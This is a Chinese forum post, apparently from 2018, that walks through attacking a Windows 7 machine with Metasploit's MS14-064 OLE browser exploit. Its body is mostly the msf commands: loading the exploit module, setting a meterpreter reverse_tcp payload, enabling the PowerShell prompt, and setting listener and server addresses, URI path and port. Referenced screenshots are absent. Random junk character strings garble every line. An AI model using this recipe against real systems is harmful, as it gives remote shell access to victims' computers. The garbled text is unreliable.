找回密码
 立即注册
查看: 2639|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

$ B5 N# c) h; {. j, u$ q8 m6 _ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 ( J: e' J8 q3 g: k l

/ o! O& B% G8 ?" ^9 g; @

! M0 C5 L" ^& n9 d' J 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: - |$ m' K1 @, ^/ A( A% `1 k2 E9 K

+ k" s3 L: B8 v( E# B/ R

$ w$ {$ B7 {0 d+ r/ H$ f8 [4 w. N 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp . C# k. x) R0 w7 p: P# T: Z! ?

. j: q( p+ u7 W b7 ?

( h) i v- ~- d5 V             set AllowPowershellPrompt true . _: s! d; I/ i% ^# t$ y8 Q3 M

8 x5 X a" I& m8 d' B8 w" K1 F% m/ ]

7 \+ p( i* ^: j' e6 C             Set LHOST 192.168.0.109 0 f1 j) O6 G$ `$ c' N: g3 S

/ `7 k( g) j4 u$ m3 \- O

5 a' p+ L* O, B" z! F; a& \1 a             set SRVHOST 192.168.0.109 + r) ]; p0 Z. |/ h& M$ u

' c9 P/ D/ h$ j2 n+ v& M

4 N# |2 `$ C6 i' k4 z9 P$ C             Set uripath share4 ~4 T2 w; S5 F/ v

! R9 B7 p" X8 n, G: N$ w' }

/ U! Z; y/ N" Z) v' c; a             Set srvport 80 , @) d$ V- ~1 m# W8 n4 @

; U4 T. r' ]) m" j4 r

/ _& \3 `9 P4 B1 B  ; @6 L9 V1 A" x+ ?

" R: \8 P+ ~: h& \# Z9 A" D6 \ k3 m6 [

8 n% c1 {0 v! x; y! U  / b4 W/ p; o+ H6 {/ f) J% P

7 a4 T$ O3 z$ H6 A G. V. @8 ?

" S) Q9 n2 C# r, B' M5 f# `4 [9 i- h  6 h) ^+ Z0 _9 ?, M1 ^& `

* X- {/ Z6 A. p0 K. ^( P& O

7 c3 A+ M6 c7 F5 V5 z; T   * g3 z6 l( `7 `# m3 I, N

: l: J' h, `, O4 O% f

- a; T. q* s& Z) i  ) L3 q# e+ @ p/ [! w8 I$ v% P t

. y3 r' t2 Z. P- r

1 n5 K& {" w `) @$ r/ \# v( y* J 下面我们来访问本地地址如图:' a) e8 z6 G s8 U4 F

/ f- i, V: V7 [7 d1 l" O' L

0 t* _; _* Y M ^' A  % z* [" X4 E/ v; M5 C% {0 D- P

9 f! Y" M) |) G2 W

. g& k7 r6 @7 C6 `0 R( o   ; n+ }$ w% b, Q' ^5 Z# S# [1 L

: v3 g. P8 L* P0 c

2 x5 O/ B1 N! ]; y ( j3 }, W! K/ z/ Q

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表